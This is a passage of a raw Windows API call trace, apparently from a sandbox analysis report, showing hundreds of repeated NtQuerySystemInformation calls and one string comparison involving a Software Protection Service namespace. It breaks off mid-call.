NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0230.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0230.543] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0230.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0230.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x50, ResultLength=0x0) [0230.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0230.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0230.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0230.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0230.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0230.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0230.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0230.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0230.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0230.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0230.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0230.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0230.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0230.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0230.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0230.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0230.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0230.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x50, ResultLength=0x0) [0230.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x50, ResultLength=0x0) [0230.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x50, ResultLength=0x0) [0230.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x50, ResultLength=0x0) [0230.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x50, ResultLength=0x0) [0230.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x50, ResultLength=0x0) [0230.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x50, ResultLength=0x0) [0230.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce10, Length=0x38, ResultLength=0x0) [0230.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc40, Length=0x28, ResultLength=0x0) [0230.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc40, Length=0x28, ResultLength=0x0) [0230.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc40, Length=0x28, ResultLength=0x0) [0230.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc40, Length=0x28, ResultLength=0x0) [0230.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fccb0, Length=0x28, ResultLength=0x0) [0230.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce10, Length=0x38, ResultLength=0x0) [0230.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd30, Length=0x28, ResultLength=0x0) [0230.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcd30, Length=0x28, ResultLength=0x0) [0230.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcbd0, Length=0x20, ResultLength=0x0) [0230.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcb50, Length=0x20, ResultLength=0x0) [0230.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcb50, Length=0x20, ResultLength=0x0) [0230.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcb50, Length=0x20, ResultLength=0x0) [0230.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce10, Length=0x38, ResultLength=0x0) [0230.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce10, Length=0x38, ResultLength=0x0) [0230.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc90, Length=0x20, ResultLength=0x0) [0230.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc20, Length=0x20, ResultLength=0x0) [0230.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcc20, Length=0x20, ResultLength=0x0) [0230.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0230.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0230.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0230.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0230.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0230.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0230.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0230.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0230.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x28, ResultLength=0x0) [0230.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0230.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0230.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0230.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0230.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0230.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0230.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0230.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0230.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0230.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0230.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x20, ResultLength=0x0) [0230.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce70, Length=0x20, ResultLength=0x0) [0230.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0230.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0230.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0230.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x50, ResultLength=0x0) [0230.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0230.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0230.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0230.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x28, ResultLength=0x0) [0230.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x28, ResultLength=0x0) [0230.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0230.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0230.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0230.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x38, ResultLength=0x0) [0230.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0230.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0230.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0230.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0230.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.703] NtQuerySystemInformation (SystemInformationClass=0xb9, 